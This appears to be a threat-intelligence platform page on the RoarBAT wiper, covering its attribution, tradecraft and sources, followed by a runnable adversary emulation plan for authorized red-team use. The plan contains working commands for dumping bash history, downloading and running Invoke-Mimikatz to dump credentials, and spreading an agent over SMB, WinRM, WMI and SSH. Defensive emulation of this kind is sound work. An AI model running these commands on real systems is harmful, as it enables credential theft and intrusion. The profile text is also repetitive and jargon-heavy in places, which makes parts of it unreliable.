Home/Threat Actor/RoarBAT
Threat Actor

RoarBAT

roarbat · russia · active since 2023-04

RoarBAT (canonical CERT-UA + industry naming per April-May 2023 advisory with UAC-0165 moderate- confidence Sandworm attribution) is a Sandworm UAC- 0165-attributed WinRAR-based BAT script Windows wiper deployed April-May 2023 against an unnamed Ukrainian state agency, paired with Linux Bash + dd zero-byte companion wiper for multi-platform destruction.

Russia GRU Unit 74455 Sandworm Team moderate-confidence attribution via CERT-UA canonical advisory ("UAC-0165 with moderate confidence to the notorious Sandworm group aka FROZENBARENTS, Seashell Blizzard, or Voodoo Bear") + Ukrinform January 2023 UAC-0082 overlap evidence ("The method of implementation of the malicious plan, the IP addresses of the access subjects, as well as the fact of using a modified version of RoarBat testify to the similarity with the cyberattack on Ukrinform, information about which was published in the Telegram channel 'CyberArmyofRussia_Reborn' on January 17, 2023") + Bleeping Computer + SC Media + SOCRadar + Bitdefender + Govinfosecurity industry coverage; standalone cluster paralleling nikowiper + doublezero + awfulshred in v0.1.151 Russia-aligned 2022-2023 destructive wiper operations cell; operational target profile unnamed Ukrainian state agency primary target April-May 2023 per CERT-UA + critical systems via compromised VPN accounts without MFA + multi-platform Windows + Linux destruction.

operational attack architecture: (1) cluster-defining compromised VPN account without MFA initial access per CERT- UA + Bleeping Computer + SOCRadar ("Ukraine's critical systems have been accessed through compromised VPN accounts... The attackers accessed critical systems by exploiting VPN accounts lacking multi-factor authentication")

(2) cluster- defining WinRAR legitimate-archiver weaponization via -df command per The Hacker News + Bitdefender ("the use of a new batch script-based wiper malware called RoarBAT that performs a recursive search for files with a specific list of extensions and irrevocably deletes them using the legitimate WinRAR utility. This, in turn, was achieved by archiving the identified files using the '-df' command-line option and subsequently purging the created archives"), operationally innovative living-off-the-land tradecraft transforming defensive archiver into offensive destructive capability.

(3) signature 24+ file extensions comprehensive targeting per Bitdefender (.doc + .docx + .rtf + .txt + .xls + .xlsx + .ppt + .pptx + .vsd + .vsdx + .pdf + .png + .jpeg + .jpg + .zip + .rar + .7z + .mp4 + .sql + .php + .vbk + .vib + .vrb + .p7s + .sys + .dll + .exe + .bin + .dat) including documents + images + archives + backups (.vbk/.vib/.vrb Veeam backup signatures) + system files.

(4) cluster-defining Group Policy scheduled task deployment tradecraft per CERT-UA + SOCRadar consistent with Sandworm Group Policy Object deployment pattern (v0.1.130 CaddyWiper April 2022 + v0.1.136 SwiftSlicer January 2023); (5) cluster-defining Linux Bash + dd zero-byte companion wiper for multi-platform destruction ("The threat actors used a Bash script on Linux systems, which employed the 'dd' utility to overwrite target files with zero bytes, making file recovery unlikely or impossible")

(6) cluster-defining Ukrinform UAC-0082 - UAC-0165 Sandworm attribution chain with three converging indicators (IP addresses + implementation method + modified RoarBat version) tying RoarBAT April-May 2023 attack to January 2023 Ukrinform attack and through that to Sandworm operations.

cluster fills the April-May-2023-onward + WinRAR-weaponization + Group-Policy-scheduled-task + compromised-VPN-no- MFA-initial-access + multi-platform-Windows-Linux + Sandworm-UAC-0165-Ukrinform-overlap position in Russia-aligned 2022-2023 destructive wiper operations cell.

canonical illustration of WinRAR legitimate-program weaponization + GPO scheduled task Sandworm deployment pattern + compromised VPN no-MFA initial access + multi-platform Linux dd companion wiper + Ukrinform UAC-0082 - UAC-0165 Sandworm attribution chain cited in essentially all subsequent destructive cyberweapon industry analyses through 2023-2026 period.

russia confidence: high 13 aliases
Sigma rules200 YARA rules0 Live IOCs0 CVEs exploited0

Profile

RoarBAT (canonical CERT-UA + industry naming per April-May 2023 advisory) is a Sandworm UAC-0165 moderate-confidence-attributed WinRAR-based BAT script Windows wiper deployed April-May 2023 against an unnamed Ukrainian state agency, paired with Linux Bash + dd zero-byte companion wiper for multi- platform destruction. Russia GRU Unit 74455 Sandworm Team moderate- confidence attribution via CERT-UA UAC-0165 canonical advisory + Ukrinform January 2023 UAC-0082 overlap evidence (IP addresses + implementation method + modified RoarBat version). Standalone cluster paralleling nikowiper + doublezero + awfulshred in v0.1.151 Russia-aligned 2022-2023 destructive wiper operations cell.

Operational target profile
  • Unnamed Ukrainian state agency primary target April-May 2023 per CERT-UA.
  • Critical systems via compromised VPN no-MFA.
  • Multi-platform Windows + Linux destruction Operational attack architecture: (1) Compromised VPN account without MFA initial access (cluster-defining): per CERT-UA + Bleeping Computer + SOCRadar (2) WinRAR weaponization via -df command (cluster-defining): legitimate archiver as file destruction vehicle, archive with -df flag auto-deletes originals, then del command removes archives (3) 24+ file extensions targeting (signature): comprehensive coverage documents + images + archives + backups + system files (4) Group Policy scheduled task deployment (cluster-defining): consistent with Sandworm pattern (v0.1.130 CaddyWiper April 2022 + v0.1.136 SwiftSlicer January 2023) (5) Linux Bash dd zero-byte companion wiper (cluster-defining): multi-platform destruction (6) Ukrinform UAC-0082 overlap (cluster-defining): three-indicator attribution chain (IP + method + version) tying RoarBAT to January 2023 Ukrinform via UAC-0082.
  • UAC-0165 Sandworm The cluster fills the April-May-2023-onward + WinRAR-weaponization + Group-Policy-scheduled-task + compromised-VPN-no-MFA-initial-access + Sandworm- UAC-0165-Ukrinform-overlap position in Russia- aligned 2022-2023 destructive wiper operations cell.

Aliases

13
roarbatroar batroar_batroarbat_wiperroarbat windows bat script wiperroarbat winrar legitimate program weaponizedroarbat sandworm uac-0165 april may 2023roarbat group policy scheduled task deploymentroarbat winrar archiving -df command file deletionroarbat ukraine state agency cert-ua advisoryroarbat linux bash dd zero-byte companion wiperroarbat compromised vpn account no mfa initial accessroarbat modified roarbat ukrinform similarity ip overlap

Adversary Emulation Plan

13 steps
Runnable Caldera emulation profile Worm - Move laterally any way possible. Ordered along the attack lifecycle; each step maps to an ATT&CK technique with a concrete executor command. For authorized red-team / purple-team exercises only.
0 collection T1005 · Data from Local System darwin, linux
Parse SSH config
pip install stormssh && storm list
1 credential-access T1552.003 · Unsecured Credentials: Bash History darwin, linux
Dump history
find ~/.bash_sessions -name '*' -exec cat {} \; 2>/dev/null
2 discovery T1135 · Network Share Discovery windows
View admin shares
Get-SmbShare | ConvertTo-Json
3 discovery T1018 · Remote System Discovery darwin, linux, windows
Collect ARP details
arp -a
Run PowerKatz
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };
$web = (New-Object System.Net.WebClient);
$result = $web.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1");
iex $result; Invoke-Mimikatz -DumpCreds
5 discovery T1018 · Remote System Discovery windows
Find Hostname
nbtstat -A #{remote.host.ip}
6 discovery T1018 · Remote System Discovery windows
Reverse nslookup IP
nslookup #{remote.host.ip}
Mount Share
net use \\#{remote.host.fqdn}\C$ /user:#{domain.user.name} #{domain.user.password}
Copy 54ndc47 (SMB)
$path = "sandcat.go-windows";
$drive = "\\#{remote.host.fqdn}\C$";
Copy-Item -v -Path $path -Destination $drive"\Users\Public\s4ndc4t.exe";
9 lateral-movement T1570 · Lateral Tool Transfer windows, darwin, linux
Copy 54ndc47 (WinRM and SCP)
$job = Start-Job -ScriptBlock {
  $username = "#{domain.user.name}";
  $password = "#{domain.user.password}";
  $secstr = New-Object -TypeName System.Security.SecureString;
  $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
  $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
  $session = New-PSSession -ComputerName "#{remote.host.name}" -Credential $cred;
  $location = "#{location}";
  $exe = "#{exe_name}";
  Copy-Item $location -Destination "C:\Users\Public\svchost.exe" -ToSession $session;
  Start-Sleep -s 5;
  Remove-PSSession -Session $session;
};
Receive-Job -Job $job -Wait;
Start 54ndc47 (WMI)
$node = '''#{remote.host.fqdn}''';
$user = '''#{domain.user.name}''';
$password = '''#{domain.user.password}''';
wmic /node:$node /user:$user /password:$password process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";
Start Agent (WinRM)
$username = "#{domain.user.name}";
$password = "#{domain.user.password}";
$secstr = New-Object -TypeName System.Security.SecureString;
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;
Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\Users\Public\svchost.exe -server #{server} }};
Start-Sleep -s 5;
Remove-PSSession -Session $session;
12 lateral-movement T1021.004 · Remote Services: SSH darwin, linux
Start 54ndc47
scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'

Notable Campaigns

8
2023-2026Continued Industry Reference Status (2023-2026)
2023RoarBAT Origin, Ukrainian State Agency Attack (April-May 2023)
2023RoarBAT Compromised VPN Account Without MFA Initial Access (Signature)
2023RoarBAT WinRAR Weaponization via -df Command Signature
2023RoarBAT 24+ File Extensions Targeting Signature
2023RoarBAT Group Policy Scheduled Task Deployment Signature
2023RoarBAT Linux Bash dd Zero-Byte Companion Wiper Signature
2023RoarBAT Ukrinform UAC-0082 Overlap + UAC-0165 Sandworm Moderate-Confidence Attribution

Attribution & Reporting

Attributed by
CERT-UA (canonical April-May 2023 advisory + UAC-0165 moderate-confidence Sandworm attribution + IP/implementation/version Ukrinform overlap evidence)The Hacker News (canonical May 8, 2023 CERT-UA SmokeLoader + RoarBAT coverage)Bleeping Computer (canonical May 4, 2023 Russian hackers WinRAR Ukraine state agency coverage)SC Media (canonical May 5, 2023 Ukrainian state network WinRAR Sandworm attack coverage)SOCRadar (canonical Sandworm Attackers Use WinRAR to Wipe Data from Government Devices analysis)Bitdefender HotForSecurity (canonical Russian Hackers Leverage WinRAR Unleash Wiper Malware analysis)Govinfosecurity (canonical WinRAR Weaponized for Attacks on Ukrainian Public Sector coverage)Cybersecurity-help.cz (canonical Russia-linked Sandworm continuing destructive attacks coverage)Computing.co.uk (canonical Russians Weaponise WinRAR coverage)CyberArmyofRussia_Reborn Telegram channel (referenced by CERT-UA as January 17, 2023 Ukrinform-publication signature)
Key reporting
reportCERT-UA: canonical April-May 2023 RoarBAT advisory + UAC-0165 moderate-confidence Sandworm attribution
reportThe Hacker News: CERT-UA Warns of SmokeLoader and RoarBAT Malware Attacks Against Ukraine (May 8, 2023)
reportBleeping Computer: Russian hackers use WinRAR to wipe Ukraine state agency's data (May 4, 2023)
reportSC Media: Ukrainian state network data erased with WinRAR in Sandworm attack (May 5, 2023)
reportSOCRadar: Sandworm Attackers Use WinRAR to Wipe Data from Government Devices (canonical detailed analysis)
reportBitdefender HotForSecurity: Russian Hackers Leverage WinRAR to Unleash Wiper Malware on Ukrainian State Networks
reportGovinfosecurity: WinRAR Weaponized for Attacks on Ukrainian Public Sector
reportCybersecurity-help.cz: Russia-linked Sandworm continuing to target Ukraine with destructive attacks
reportComputing.co.uk: Russians weaponise WinRAR to attack Ukraine

Operational

State sponsor

Russia GRU Unit 74455, Sandworm Team via CERT-UA UAC-0165 moderate-confidence attribution. Industry tracking per The Hacker News + Bleeping Computer + Bitdefender + SOCRadar + Govinfosecurity. CERT-UA canonical April-May 2023 advisory.

Attribution chain: (1) CERT-UA canonical April-May 2023 advisory + UAC-0165 moderate-confidence Sandworm attribution: per The Hacker News: "The agency further attributed UAC-0165 with moderate confidence to the notorious Sandworm group (aka FROZENBARENTS, Seashell Blizzard, or Voodoo Bear), which has a history of unleashing wiper attacks since the start of the Russo-Ukrainian war last year. The link to Sandworm stems from significant overlaps with another destructive attack that hit the Ukrainian state news agency Ukrinform in January 2023, which was tied to the adversarial collective." (2) CERT-UA Ukrinform-overlap-evidence: per CERT-UA: "The method of implementation of the malicious plan, the IP addresses of the access subjects, as well as the fact of using a modified version of RoarBat testify to the similarity with the cyberattack on Ukrinform, information about which was published in the Telegram channel 'CyberArmyofRussia_Reborn' on January 17, 2023." Three converging attribution indicators: implementation method + IP addresses + modified RoarBat version. (3) Bleeping Computer + SC Media canonical April- May 2023 industry coverage: per Bleeping Computer: "Russian advanced persistent threat group Sandworm has leveraged the WinRAR archiving program to destroy data on Windows and Linux machines in Ukraine's state networks, reports BleepingComputer.

Ukraine's critical systems have been accessed through compromised VPN accounts, with WinRAR then used to enable scripts for wiping machine-stored files, according to a new advisory from the Ukrainian Government Computer Emergency Response Team." (4) Bitdefender + SOCRadar canonical technical analysis: per Bitdefender: "The Russian hackers, believed to be part of the infamous Sandworm hacking group, used a BAT script called 'RoarBat' on Windows devices. The script searches for specific file types across the target's disks and directories." Per SOCRadar: "Sandworm (UAC-0165), a Russian hacking group, has been linked to an attack on Ukrainian state networks that involved wiping data from government devices using WinRAR." (5) Computing.co.uk + Govinfosecurity canonical coverage: per Computing.co.uk: "These include IP addresses associated with the group, the discovery of a modified version of RoarBat, and 'the method of implementation' used. The indicators share similarities with a previous attack in January targeting Ukrinform, the country's national news agency." Operational mission objective: Destructive wiper deployment against Ukrainian state networks April-May 2023.

Operationally aligned with Sandworm UAC-0165 tracking + Ukrinform January 2023 UAC-0082 cyber-kinetic tradition. Multi-platform Windows + Linux destruction with WinRAR/dd legitimate-program weaponization.

Operational target profile
  • Unnamed Ukrainian state agency primary target April-May 2023 per CERT-UA.
  • Critical systems accessed via compromised VPN accounts without MFA.
  • Windows + Linux + FreeBSD multi-platform destructive operations The cluster fills the April-May-2023-onward + WinRAR-weaponization + Group-Policy-scheduled-task + compromised-VPN-no-MFA-initial-access + Sandworm- UAC-0165-Ukrinform-overlap position in Russia- aligned 2022-2023 destructive wiper operations cell.
Motivations
russian_state_destructive_cyberweapon_operations, ukrainian_state_agency_destruction, sandworm_uac_0165_moderate_confidence_signature_capability, winrar_legitimate_program_weaponization_signature_tradecraft, group_policy_scheduled_task_deployment_signature_tradecraft, compromised_vpn_no_mfa_initial_access_signature_tradecraft, multi_platform_windows_linux_destruction_signature_capability
Sectors
Regions

Detection Blind Spots

60 techniques
Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.
Behavioral / log (Sigma)57/60 · 95%
Analytics (MITRE CAR)33/60 · 55%
Runtime / container (Falco)9/60 · 15%
File / malware (YARA)0/60 · 0%
Network (Suricata/Snort)17/60 · 28%
Vuln scan (Nuclei)0/60 · 0%

Atomic Test Plan

30 techniques
Runnable Atomic Red Team tests covering this actor’s mapped techniques - validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use. Open the full builder

Tools Used

0 mapped
Other tooling / TTPs (curation, not ATT&CK-mapped):
SANDWORM UAC-0165 CERT-UA MODERATE CONFIDENCE ATTRIBUTION
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin